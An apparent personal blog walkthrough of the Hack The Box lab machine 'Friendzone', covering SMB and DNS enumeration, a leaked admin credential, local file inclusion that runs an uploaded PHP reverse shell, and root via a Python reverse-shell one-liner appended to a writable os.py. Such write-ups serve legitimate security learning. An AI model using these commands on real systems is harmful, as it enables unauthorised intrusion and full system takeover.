NitheshD05 | Cyber Realm

Search

SearchSearch

Friendzone

Apr 16, 20263 min read

HTB Profile Image

Ping

Nmap Scans

mapit 10.10.10.123

Nmap Default Scan

Nmap Service and Script Scan

Nmap All port Scan

On Port 80 http://10.10.10.123

Smb Enumeration using Smbclient

smbclient -U '' -L \\\\10.10.10.123\\\\

if you can’t access the share, play with slashes

smbclient \\\\10.10.10.123\\Development\\

Nothing in Development

Can’t get cmd for Files

Share general

smbclient \\\\10.10.10.123\\general\\

Will analyse the file creds.txt admin:WORKWORKHhallelujah@#

Will try this with ftp first Didn’t Work…!

Gobuster Scan

gobuster dir -u http://10.10.10.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster.txt

We can see something interesting

On http://10.10.10.123/robots.txt hahahahahaha…:)

On http://10.10.10.123/wordpress nothing here as well

But there is dns Port 53 is open, will find is there anymore domain names are there, because we have password for admin , we don’t know where to use it.

Use this link for dns Enumeration:https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

We can already see on nmap Scan, there is a domain name friendzone.red, will add this to our hosts file

Will use dig to dig DNS

dig axfr @10.10.10.123 friendzone.red

Now we have lot of Domain names

Added all newly found domain names

On https://friendzone.red/

On https://administrator1.friendzone.red/

After login, it say’s visit /dashboard.php https://administrator1.friendzone.red/dashboard.php

On https://uploads.friendzone.red/

Nothing on hr

Uploaded a simple jpg file

Now will follow this

Will jump to Initial foothold…!

Will use the default https://administrator1.friendzone.red/dashboard.php?%20image_id=a.jpg&pagename=timestamp I think pagename is vulnerable to LFI

We have already seen that the smb shares So there might be chances for other two shares are in /etc

Will check that..!

Will put php reverse shell Will trigger rev.php

It worked, but without extension https://administrator1.friendzone.red/dashboard.php?%2520image_id=a.jpg&pagename=/etc/Development/rev

Will check our listener

Upgraded my shell using python

python3 -c 'import pty; pty.spawn("/bin/bash")'

User.txt

Will Jump to Privilege Escalation…!

In have launched pspy and found this reporter.py is run by root periodically

Will check that It imports OS, I have already seen os.py while running linpeas.sh

So it is writable

Ok then will repalce the os.py with our reverse shell Oneliner 

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' >> os.py

Added this at the end

And waited for shell as root and got it

Root.txt

Done with Friendzone…:)

Backlinks

Graph View